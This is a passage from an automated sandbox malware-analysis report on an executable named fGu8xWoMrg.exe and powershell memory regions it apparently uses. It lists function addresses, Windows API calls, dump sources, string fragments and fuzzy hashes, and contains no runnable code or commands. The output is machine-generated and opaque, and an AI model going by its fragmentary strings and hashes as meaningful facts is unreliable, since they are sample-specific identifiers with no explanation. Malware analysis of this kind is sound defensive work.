                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                                                                                                                                            Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403B42
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 1100898210-823278215
                                                                                                                                                                            • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                                                                                                                                            • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                            • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                                                                                                                                            Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003), ref: 00405E38
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                            • API String ID: 2709904686-1246513382
                                                                                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                                                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                            • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                                                                                                                                            Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                            • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 0764BE0E Relevance: 64.3, Strings: 50, Instructions: 1844COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$4'eq$4'eq$4'eq$4ql$4ql$tLfk$tLfk$tLfk$tLfk$tLfk$tLfk$x.ek$x.ek$x.ek$-ek$-ek
                                                                                                                                                                            • API String ID: 0-1812172271
                                                                                                                                                                            • Opcode ID: 0d9b356097736ab4404d8ccc88322290da62889bfd4a67d46b18902cf89ec303
                                                                                                                                                                            • Instruction ID: 38f48a5837feacc59db0f8ae4616639e6de9bd29d47b17d4175c3e877c8130a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d9b356097736ab4404d8ccc88322290da62889bfd4a67d46b18902cf89ec303
                                                                                                                                                                            • Instruction Fuzzy Hash: 690341B4E01214DFDB65DF68C951B9ABBB2AF85304F10C4A9D90A6B781CB31EE81CF51
                                                                                                                                                                            Function 0764CBEE Relevance: 43.7, Strings: 34, Instructions: 1234COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$4'eq$tLfk$tLfk$tLfk$tLfk$x.ek$x.ek$-ek$-ek
                                                                                                                                                                            • API String ID: 0-1047989407
                                                                                                                                                                            • Opcode ID: 36827ef8d23a0599a7571556505c44e878f58906d78b4fb762b7acb05ea1eafe
                                                                                                                                                                            • Instruction ID: 339ffca3756cc17dac50857b096be5269d135adc1e48ac1d75598841524eeac2
                                                                                                                                                                            • Opcode Fuzzy Hash: 36827ef8d23a0599a7571556505c44e878f58906d78b4fb762b7acb05ea1eafe
                                                                                                                                                                            • Instruction Fuzzy Hash: 85C252F4A016149FD764DF68C950BDABBB2AF85304F10C4A9D90A6B785CB32EE81CF51
                                                                                                                                                                            Function 0764742A Relevance: 33.4, Strings: 26, Instructions: 890COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-2918858115
                                                                                                                                                                            • Opcode ID: 6beada1b7241745677f1890c538892472562a426f56b19844c2b3fe28279fe02
                                                                                                                                                                            • Instruction ID: 982ae2a4d1583f6e090fd5188570f62d24035dbc711fe5a2b78e17a32f19df25
                                                                                                                                                                            • Opcode Fuzzy Hash: 6beada1b7241745677f1890c538892472562a426f56b19844c2b3fe28279fe02
                                                                                                                                                                            • Instruction Fuzzy Hash: 96829EF4A01214DFDB24DF68C951BAABBB2AB85304F10C4A9D94B6B741CB71EE81CF51
                                                                                                                                                                            Function 07646608 Relevance: 28.4, Strings: 22, Instructions: 906COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-1734575635
                                                                                                                                                                            • Opcode ID: 5a9bcd10810bcc9f55df75b140fc6a74b2da9d20064bdc60f7578737ec06ebf3
                                                                                                                                                                            • Instruction ID: a266f55331c8cf1a05e540002972293c5a8d46473d68233efc7d2ec4b94a0fa2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a9bcd10810bcc9f55df75b140fc6a74b2da9d20064bdc60f7578737ec06ebf3
                                                                                                                                                                            • Instruction Fuzzy Hash: A3827FF4A01214DFDB24DF68C951BAEBBB2AB85304F10C4A9D90A6B745CB72ED81CF51
                                                                                                                                                                            Function 076465EA Relevance: 23.3, Strings: 18, Instructions: 830COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-162867847
                                                                                                                                                                            • Opcode ID: e82d245207d8605dc5285881febcce990896483df95914a33fcccab27568fceb
                                                                                                                                                                            • Instruction ID: 517ff5ba9c2f5acc95bde2118e6583c348bcb1945982005b6ccc9cac1f8a2857
                                                                                                                                                                            • Opcode Fuzzy Hash: e82d245207d8605dc5285881febcce990896483df95914a33fcccab27568fceb
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E727DB4A00215DFDB24DF68C951BAEBBB2AF85304F10C5A9D94A6B741CB32ED81CF51
                                                                                                                                                                            Function 07647602 Relevance: 20.6, Strings: 16, Instructions: 644COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-792957894
                                                                                                                                                                            • Opcode ID: 5ccf6f1ce937765e16b2870749bb1a0fa3b4f51a33567a56117b0da3a20f26d8
                                                                                                                                                                            • Instruction ID: 9d5f2e53c5235e03e24873a316d83872479ff1e9d77dbcec2b4fd4e95c5ebbc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ccf6f1ce937765e16b2870749bb1a0fa3b4f51a33567a56117b0da3a20f26d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 16528FF4A01214DFDB24DF68C951BAEBBB2AB85304F10C4A9D94A6B741CB72ED81CF51
                                                                                                                                                                            Function 0764CDB2 Relevance: 20.6, Strings: 16, Instructions: 624COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$4'eq$tLfk$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-792957894
                                                                                                                                                                            • Opcode ID: 9d1e9f8ced18390ab963d80a052b43ee500526b12e65e4934f1aa673ae7d3c6e
                                                                                                                                                                            • Instruction ID: fe19e6e4ed2bd7101647695a69f9547d1bc10b9661c7741ea636aafc8049745d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d1e9f8ced18390ab963d80a052b43ee500526b12e65e4934f1aa673ae7d3c6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C4274B4A016149FD764DF68C950BDABBB2EF85304F10C4A9D50A6B785CB32EE81CF51
                                                                                                                                                                            Function 08F92960 Relevance: 14.6, Strings: 11, Instructions: 822COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$84rl$84rl$tPeq$tPeq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2022112988
                                                                                                                                                                            • Opcode ID: 7e48b950166e82e1f6d276217feb9eb234acfdee56a6ab83f08407dad97973b8
                                                                                                                                                                            • Instruction ID: 24b31976e82364195e01ea48094a875d1ceeb90dc73d0f34174ada931b85ee8e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7e48b950166e82e1f6d276217feb9eb234acfdee56a6ab83f08407dad97973b8
                                                                                                                                                                            • Instruction Fuzzy Hash: AF52D371F00204EFEF259F79C85166ABBA2EF85312F1580AEE8558B392DB31DD41C7A1
                                                                                                                                                                            Function 07647968 Relevance: 12.9, Strings: 10, Instructions: 373COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$4'eq$4'eq$4'eq$4'eq$Pi$Pi$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-3482921068
                                                                                                                                                                            • Opcode ID: e5cfcf3b44f5da2c51b0afeb9abe28d0996cd259db3307522c6605e9e588f4d4
                                                                                                                                                                            • Instruction ID: 661e8a96638cc1ed7bc43db09bb0dc0d272efe01c5b1b582f8a327307fe5efd7
                                                                                                                                                                            • Opcode Fuzzy Hash: e5cfcf3b44f5da2c51b0afeb9abe28d0996cd259db3307522c6605e9e588f4d4
                                                                                                                                                                            • Instruction Fuzzy Hash: 3DE16CF0B102059FCB14DFA8C551BAEBBA2AF89304F14C469D5066F795CB72ED82CB91
                                                                                                                                                                            Function 0764D044 Relevance: 11.7, Strings: 9, Instructions: 435COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$4'eq$4ql$tLfk$x.ek
                                                                                                                                                                            • API String ID: 0-2298317571
                                                                                                                                                                            • Opcode ID: 1f172057c5ffd00bf33e8cd3d6b5628369d821913ab5a94deff0e51b8356471d
                                                                                                                                                                            • Instruction ID: bf8da793e97754c6d598a01a01fa29915d6035582c6c9baef1649191569b7f0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f172057c5ffd00bf33e8cd3d6b5628369d821913ab5a94deff0e51b8356471d
                                                                                                                                                                            • Instruction Fuzzy Hash: C9122BF4F01215DFDB61DB28C951BA9B7B2AB45304F0084E9DA4AAB791CB31EE81CF51
                                                                                                                                                                            Function 0764794E Relevance: 7.8, Strings: 6, Instructions: 307COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$4'eq$4'eq$Pi$x.ek$-ek
                                                                                                                                                                            • API String ID: 0-2315814973
                                                                                                                                                                            • Opcode ID: 892f2d4d35025748ad856681d30d76d7dff3a7b443461f5790b4f398beb0f237
                                                                                                                                                                            • Instruction ID: 705d020249c091df8143426ec8c1bf84dd1ed151b5016542e68159ecb50de052
                                                                                                                                                                            • Opcode Fuzzy Hash: 892f2d4d35025748ad856681d30d76d7dff3a7b443461f5790b4f398beb0f237
                                                                                                                                                                            • Instruction Fuzzy Hash: E2C17DF0A002059FCB14DFA4C541BAABBB2AF89314F15C569E9066F395CB32ED81CB91
                                                                                                                                                                            Function 07647642 Relevance: 6.4, Strings: 5, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$h2gk$tLfk
                                                                                                                                                                            • API String ID: 0-3096055848
                                                                                                                                                                            • Opcode ID: 75a7afa1c877f4d4c15723119ff00c45374b31b2b977f21d0652194774508d2d
                                                                                                                                                                            • Instruction ID: eb452f4146780df86ab73af88658b35a2bf3aa13bd5cdd0e3e7f5075be9f590f
                                                                                                                                                                            • Opcode Fuzzy Hash: 75a7afa1c877f4d4c15723119ff00c45374b31b2b977f21d0652194774508d2d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2261B4F0A00255DFDB34DF68C990BA9BBA2BF45304F0084AAD95B6BB51CB31AD85CB51
                                                                                                                                                                            Function 07642070 Relevance: 5.5, Strings: 4, Instructions: 521COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-733111579
                                                                                                                                                                            • Opcode ID: 941c9e611295a5b78ec4d7e5348e4ba6e4c8eaa30f38937f79a311388bfd6e99
                                                                                                                                                                            • Instruction ID: a0272b6b34dd87366d1cfedd590cb8158cf615c657d7e55dda5c151df63e3be8
                                                                                                                                                                            • Opcode Fuzzy Hash: 941c9e611295a5b78ec4d7e5348e4ba6e4c8eaa30f38937f79a311388bfd6e99
                                                                                                                                                                            • Instruction Fuzzy Hash: 58F12BF1B042168FCB159B78952166BBBA2FFD5210F24C06AE507CB791DB31C986C7A2
                                                                                                                                                                            Function 08F90EE0 Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-2146945663
                                                                                                                                                                            • Opcode ID: fabca277706561b65ddb9189c1966e8ec1be349239a374135550dfe41123ec2e
